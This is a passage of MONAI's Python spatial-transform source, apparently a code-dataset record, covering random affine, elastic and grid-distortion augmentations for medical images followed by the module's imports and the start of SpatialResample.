a tuple of 2 floats for 2D, a tuple of 6 floats for 3D. Defaults to no shearing.
translate_params: a tuple of 2 floats for 2D, a tuple of 3 floats for 3D. Translation is in
pixel/voxel relative to the center of the input image. Defaults to no translation.
scale_params: scale factor for every spatial dims. a tuple of 2 floats for 2D,
a tuple of 3 floats for 3D. Defaults to `1.0`.
affine: If applied, ignore the params (`rotate_params`, etc.) and use the
supplied matrix. Should be square with each side = num of image spatial
dimensions + 1.
spatial_size: output image spatial size.
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if some components of the `spatial_size` are non-positive values, the transform will use the
corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
to `(32, 64)` if the second spatial dimension size of img is `64`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"reflection"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
norm_coords: whether to normalize the coordinates from `[-(size-1)/2, (size-1)/2]` to
`[0, size - 1]` or `[-1, 1]` to be compatible with the underlying resampling API.
If the coordinates are generated by ``monai.transforms.utils.create_grid``
and the ``affine`` doesn't include the normalization, this argument should be set to ``True``.
If the output `self.affine_grid` is already normalized, this argument should be set to ``False``.
device: device on which the tensor will be allocated.
dtype: data type for resampling computation. Defaults to ``np.float32``.
If ``None``, use the data type of input data. To be compatible with other modules,
the output data type is always `float32`.
image_only: if True return only the image volume, otherwise return (image, affine).
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
self.affine_grid = AffineGrid(
rotate_params=rotate_params,
shear_params=shear_params,
translate_params=translate_params,
scale_params=scale_params,
affine=affine,
dtype=dtype,
device=device,
)
self.image_only = image_only
self.resampler = Resample(norm_coords=norm_coords, device=device, dtype=dtype)
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor]]:
"""
Args:
img: shape must be (num_channels, H, W[, D]),
spatial_size: output image spatial size.
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if `img` has two spatial dimensions, `spatial_size` should have 2 elements [h, w].
if `img` has three spatial dimensions, `spatial_size` should have 3 elements [h, w, d].
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
When `USE_COMPILED` is `True`, this argument uses
``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
See also: https://docs.monai.io/en/stable/networks.html#grid-pull
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
"""
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
grid, affine = self.affine_grid(spatial_size=sp_size)
ret = self.resampler(img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode)
return ret if self.image_only else (ret, affine)
class RandAffine(RandomizableTransform):
"""
Random affine transform.
A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
"""
backend = Affine.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
cache_grid: bool = False,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
"""
Args:
prob: probability of returning a randomized affine grid.
defaults to 0.1, with 10% chance returns a randomized grid.
rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
`uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
for dim0 and nothing for the remaining dimensions.
shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
shearing factors(a tuple of 2 floats for 2D, a tuple of 6 floats for 3D) for affine matrix,
take a 3D affine as example::
[
[1.0, params[0], params[1], 0.0],
[params[2], 1.0, params[3], 0.0],
[params[4], params[5], 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
]
translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
select pixel/voxel to translate for every spatial dims.
scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
This allows 0 to correspond to no change (i.e., a scaling of 1.0).
spatial_size: output image spatial size.
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if some components of the `spatial_size` are non-positive values, the transform will use the
corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
to `(32, 64)` if the second spatial dimension size of img is `64`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"reflection"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
cache_grid: whether to cache the identity sampling grid.
If the spatial size is not dynamically defined by input image, enabling this option could
accelerate the transform.
device: device on which the tensor will be allocated.
See also:
- :py:class:`RandAffineGrid` for the random affine parameters configurations.
- :py:class:`Affine` for the affine transformation parameters configurations.
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
RandomizableTransform.__init__(self, prob)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.spatial_size = spatial_size
self.cache_grid = cache_grid
self._cached_grid = self._init_identity_cache()
self.mode: GridSampleMode = GridSampleMode(mode)
self.padding_mode: GridSamplePadMode = GridSamplePadMode(padding_mode)
def _init_identity_cache(self):
"""
Create cache of the identity grid if cache_grid=True and spatial_size is known.
"""
if self.spatial_size is None:
if self.cache_grid:
warnings.warn(
"cache_grid=True is not compatible with the dynamic spatial_size, please specify 'spatial_size'."
)
return None
_sp_size = ensure_tuple(self.spatial_size)
_ndim = len(_sp_size)
if _sp_size != fall_back_tuple(_sp_size, [1] * _ndim) or _sp_size != fall_back_tuple(_sp_size, [2] * _ndim):
# dynamic shape because it falls back to different outcomes
if self.cache_grid:
warnings.warn(
"cache_grid=True is not compatible with the dynamic spatial_size "
f"'spatial_size={self.spatial_size}', please specify 'spatial_size'."
)
return None
return create_grid(spatial_size=_sp_size, device=self.rand_affine_grid.device, backend="torch")
def get_identity_grid(self, spatial_size: Sequence[int]):
"""
Return a cached or new identity grid depends on the availability.
Args:
spatial_size: non-dynamic spatial size
"""
ndim = len(spatial_size)
if spatial_size != fall_back_tuple(spatial_size, [1] * ndim) or spatial_size != fall_back_tuple(
spatial_size, [2] * ndim
):
raise RuntimeError(f"spatial_size should not be dynamic, got {spatial_size}.")
return (
create_grid(spatial_size=spatial_size, device=self.rand_affine_grid.device, backend="torch")
if self._cached_grid is None
else self._cached_grid
)
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "RandAffine":
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W[, D]),
spatial_size: output image spatial size.
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if `img` has two spatial dimensions, `spatial_size` should have 2 elements [h, w].
if `img` has three spatial dimensions, `spatial_size` should have 3 elements [h, w, d].
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
randomize: whether to execute `randomize()` function first, default to True.
"""
if randomize:
self.randomize()
# if not doing transform and spatial size doesn't change, nothing to do
# except convert to float and device
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
do_resampling = self._do_transform or (sp_size != ensure_tuple(img.shape[1:]))
if not do_resampling:
img, *_ = convert_data_type(img, dtype=torch.float32, device=self.resampler.device)
grid = self.get_identity_grid(sp_size)
if self._do_transform:
grid = self.rand_affine_grid(grid=grid)
out: NdarrayOrTensor = self.resampler(
img=img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class Rand2DElastic(RandomizableTransform):
"""
Random elastic deformation and affine in 2D.
A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
"""
backend = Resample.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
spacing: Union[Tuple[float, float], float],
magnitude_range: Tuple[float, float],
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Tuple[int, int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
as_tensor_output: bool = False,
device: Optional[torch.device] = None,
) -> None:
"""
Args:
spacing : distance in between the control points.
magnitude_range: the random offsets will be generated from ``uniform[magnitude[0], magnitude[1])``.
prob: probability of returning a randomized elastic transform.
defaults to 0.1, with 10% chance returns a randomized elastic transform,
otherwise returns a ``spatial_size`` centered area extracted from the input image.
rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
`uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
for dim0 and nothing for the remaining dimensions.
shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
shearing factors(a tuple of 2 floats for 2D) for affine matrix, take a 2D affine as example::
[
[1.0, params[0], 0.0],
[params[1], 1.0, 0.0],
[0.0, 0.0, 1.0],
]
translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
select pixel to translate for every spatial dims.
scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
This allows 0 to correspond to no change (i.e., a scaling of 1.0).
spatial_size: specifying output image spatial size [h, w].
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if some components of the `spatial_size` are non-positive values, the transform will use the
corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
to `(32, 64)` if the second spatial dimension size of img is `64`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"reflection"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
device: device on which the tensor will be allocated.
See also:
- :py:class:`RandAffineGrid` for the random affine parameters configurations.
- :py:class:`Affine` for the affine transformation parameters configurations.
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
RandomizableTransform.__init__(self, prob)
self.deform_grid = RandDeformGrid(
spacing=spacing, magnitude_range=magnitude_range, as_tensor_output=True, device=device
)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.device = device
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Rand2DElastic":
self.deform_grid.set_random_state(seed, state)
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, spatial_size: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.deform_grid.randomize(spatial_size)
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Tuple[int, int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W),
spatial_size: specifying output image spatial size [h, w].
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
randomize: whether to execute `randomize()` function first, default to True.
"""
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
if randomize:
self.randomize(spatial_size=sp_size)
if self._do_transform:
grid = self.deform_grid(spatial_size=sp_size)
grid = self.rand_affine_grid(grid=grid)
grid = torch.nn.functional.interpolate( # type: ignore
recompute_scale_factor=True,
input=grid.unsqueeze(0),
scale_factor=list(ensure_tuple(self.deform_grid.spacing)),
mode=InterpolateMode.BICUBIC.value,
align_corners=False,
)
grid = CenterSpatialCrop(roi_size=sp_size)(grid[0])
else:
_device = img.device if isinstance(img, torch.Tensor) else self.device
grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
out: NdarrayOrTensor = self.resampler(
img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class Rand3DElastic(RandomizableTransform):
"""
Random elastic deformation and affine in 3D.
A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
"""
backend = Resample.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
sigma_range: Tuple[float, float],
magnitude_range: Tuple[float, float],
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
as_tensor_output: bool = False,
device: Optional[torch.device] = None,
) -> None:
"""
Args:
sigma_range: a Gaussian kernel with standard deviation sampled from
``uniform[sigma_range[0], sigma_range[1])`` will be used to smooth the random offset grid.
magnitude_range: the random offsets on the grid will be generated from
``uniform[magnitude[0], magnitude[1])``.
prob: probability of returning a randomized elastic transform.
defaults to 0.1, with 10% chance returns a randomized elastic transform,
otherwise returns a ``spatial_size`` centered area extracted from the input image.
rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
`uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
for dim0 and nothing for the remaining dimensions.
shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
shearing factors(a tuple of 6 floats for 3D) for affine matrix, take a 3D affine as example::
[
[1.0, params[0], params[1], 0.0],
[params[2], 1.0, params[3], 0.0],
[params[4], params[5], 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
]
translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
select voxel to translate for every spatial dims.
scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
This allows 0 to correspond to no change (i.e., a scaling of 1.0).
spatial_size: specifying output image spatial size [h, w, d].
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
if some components of the `spatial_size` are non-positive values, the transform will use the
corresponding components of img size. For example, `spatial_size=(32, 32, -1)` will be adapted
to `(32, 32, 64)` if the third spatial dimension size of img is `64`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"reflection"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
device: device on which the tensor will be allocated.
See also:
- :py:class:`RandAffineGrid` for the random affine parameters configurations.
- :py:class:`Affine` for the affine transformation parameters configurations.
.. deprecated:: 0.6.0
``as_tensor_output`` is deprecated.
"""
RandomizableTransform.__init__(self, prob)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.sigma_range = sigma_range
self.magnitude_range = magnitude_range
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.device = device
self.rand_offset: np.ndarray
self.magnitude = 1.0
self.sigma = 1.0
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Rand3DElastic":
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, grid_size: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.rand_offset = self.R.uniform(-1.0, 1.0, [3] + list(grid_size)).astype(np.float32, copy=False)
self.magnitude = self.R.uniform(self.magnitude_range[0], self.magnitude_range[1])
self.sigma = self.R.uniform(self.sigma_range[0], self.sigma_range[1])
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W, D),
spatial_size: specifying spatial 3D output image spatial size [h, w, d].
if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
the transform will use the spatial size of `img`.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``self.mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``self.padding_mode``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
randomize: whether to execute `randomize()` function first, default to True.
"""
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
if randomize:
self.randomize(grid_size=sp_size)
_device = img.device if isinstance(img, torch.Tensor) else self.device
grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
if self._do_transform:
if self.rand_offset is None:
raise RuntimeError("rand_offset is not initialized.")
gaussian = GaussianFilter(3, self.sigma, 3.0).to(device=_device)
offset = torch.as_tensor(self.rand_offset, device=_device).unsqueeze(0)
grid[:3] += gaussian(offset)[0] * self.magnitude
grid = self.rand_affine_grid(grid=grid)
out: NdarrayOrTensor = self.resampler(
img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class GridDistortion(Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
num_cells: Union[Tuple[int], int],
distort_steps: Sequence[Sequence[float]],
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
device: Optional[torch.device] = None,
) -> None:
"""
Grid distortion transform. Refer to:
https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/transforms.py
Args:
num_cells: number of grid cells on each dimension.
distort_steps: This argument is a list of tuples, where each tuple contains the distort steps of the
corresponding dimensions (in the order of H, W[, D]). The length of each tuple equals to `num_cells + 1`.
Each value in the tuple represents the distort step of the related cell.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
device: device on which the tensor will be allocated.
"""
self.resampler = Resample(mode=mode, padding_mode=padding_mode, device=device)
self.num_cells = num_cells
self.distort_steps = distort_steps
self.device = device
def __call__(
self,
img: NdarrayOrTensor,
distort_steps: Optional[Sequence[Sequence]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W[, D]).
distort_steps: This argument is a list of tuples, where each tuple contains the distort steps of the
corresponding dimensions (in the order of H, W[, D]). The length of each tuple equals to `num_cells + 1`.
Each value in the tuple represents the distort step of the related cell.
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
"""
distort_steps = self.distort_steps if distort_steps is None else distort_steps
if len(img.shape) != len(distort_steps) + 1:
raise ValueError("the spatial size of `img` does not match with the length of `distort_steps`")
all_ranges = []
num_cells = ensure_tuple_rep(self.num_cells, len(img.shape) - 1)
for dim_idx, dim_size in enumerate(img.shape[1:]):
dim_distort_steps = distort_steps[dim_idx]
ranges = torch.zeros(dim_size, dtype=torch.float32)
cell_size = dim_size // num_cells[dim_idx]
prev = 0
for idx in range(num_cells[dim_idx] + 1):
start = int(idx * cell_size)
end = start + cell_size
if end > dim_size:
end = dim_size
cur = dim_size
else:
cur = prev + cell_size * dim_distort_steps[idx]
ranges[start:end] = torch.linspace(prev, cur, end - start)
prev = cur
ranges = ranges - (dim_size - 1.0) / 2.0
all_ranges.append(ranges)
coords = meshgrid_ij(*all_ranges)
grid = torch.stack([*coords, torch.ones_like(coords[0])])
return self.resampler(img, grid=grid, mode=mode, padding_mode=padding_mode) # type: ignore
class RandGridDistortion(RandomizableTransform):
backend = [TransformBackends.TORCH]
def __init__(
self,
num_cells: Union[Tuple[int], int] = 5,
prob: float = 0.1,
distort_limit: Union[Tuple[float, float], float] = (-0.03, 0.03),
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
device: Optional[torch.device] = None,
) -> None:
"""
Random grid distortion transform. Refer to:
https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/transforms.py
Args:
num_cells: number of grid cells on each dimension.
prob: probability of returning a randomized grid distortion transform. Defaults to 0.1.
distort_limit: range to randomly distort.
If single number, distort_limit is picked from (-distort_limit, distort_limit).
Defaults to (-0.03, 0.03).
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
device: device on which the tensor will be allocated.
"""
RandomizableTransform.__init__(self, prob)
self.num_cells = num_cells
if isinstance(distort_limit, (int, float)):
self.distort_limit = (min(-distort_limit, distort_limit), max(-distort_limit, distort_limit))
else:
self.distort_limit = (min(distort_limit), max(distort_limit))
self.distort_steps: Sequence[Sequence[float]] = ((1.0,),)
self.grid_distortion = GridDistortion(
num_cells=num_cells, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode, device=device
)
def randomize(self, spatial_shape: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return
self.distort_steps = tuple(
tuple(1.0 + self.R.uniform(low=self.distort_limit[0], high=self.distort_limit[1], size=n_cells + 1))
for n_cells in ensure_tuple_rep(self.num_cells, len(spatial_shape))
)
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
"""
Args:
img: shape must be (num_channels, H, W[, D]).
mode: {``"bilinear"``, ``"nearest"``}
Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
Padding mode for outside grid values. Defaults to ``"border"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
randomize: whether to shuffle the random factors using `randomize()`, default to True.
"""
if randomize:
self.randomize(img.shape[1:])
if not self._do_transform:
return img
return self.grid_distortion(img, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode)
| 49.480309 | 129 | 0.622951 |
import warnings
from copy import deepcopy
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import numpy as np
import torch
from monai.config import USE_COMPILED, DtypeLike
from monai.config.type_definitions import NdarrayOrTensor
from monai.data.utils import AFFINE_TOL, compute_shape_offset, reorient_spatial_axes, to_affine_nd, zoom_affine
from monai.networks.layers import AffineTransform, GaussianFilter, grid_pull
from monai.networks.utils import meshgrid_ij, normalize_transform
from monai.transforms.croppad.array import CenterSpatialCrop, Pad
from monai.transforms.transform import Randomizable, RandomizableTransform, ThreadUnsafe, Transform
from monai.transforms.utils import (
create_control_grid,
create_grid,
create_rotate,
create_scale,
create_shear,
create_translate,
map_spatial_axes,
)
from monai.transforms.utils_pytorch_numpy_unification import allclose, moveaxis
from monai.utils import (
GridSampleMode,
GridSamplePadMode,
InterpolateMode,
NumpyPadMode,
PytorchPadMode,
ensure_tuple,
ensure_tuple_rep,
ensure_tuple_size,
fall_back_tuple,
issequenceiterable,
optional_import,
pytorch_after,
)
from monai.utils.deprecate_utils import deprecated_arg
from monai.utils.enums import TransformBackends
from monai.utils.module import look_up_option
from monai.utils.type_conversion import convert_data_type, convert_to_dst_type
nib, has_nib = optional_import("nibabel")
__all__ = [
"SpatialResample",
"ResampleToMatch",
"Spacing",
"Orientation",
"Flip",
"GridDistortion",
"Resize",
"Rotate",
"Zoom",
"Rotate90",
"RandRotate90",
"RandRotate",
"RandFlip",
"RandGridDistortion",
"RandAxisFlip",
"RandZoom",
"AffineGrid",
"RandAffineGrid",
"RandDeformGrid",
"Resample",
"Affine",
"RandAffine",
"Rand2DElastic",
"Rand3DElastic",
]
RandRange = Optional[Union[Sequence[Union[Tuple[float, float], float]], float]]
class SpatialResample(Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
align_corners: bool = False,
dtype: DtypeLike = np.float64,
):
self.mode = mode
self.padding_mode = padding_mode
self.align_corners = align_corners
self.dtype = dtype
def __call__(
self,
img: NdarrayOrTensor,
src_affine: Optional[NdarrayOrTensor] = None,
dst_affine: Optional[NdarrayOrTensor] = None,
spatial_size: Optional[Union[Sequence[int], np.ndarray, int]] = None,
mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
align_corners: Optional[bool] = False,
dtype: DtypeLike = None,
) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
if src_affine is None:
src_affine = np.eye(4, dtype=np.float64)
spatial_rank = min(len(img.shape) - 1, src_affine.shape[0] - 1, 3)
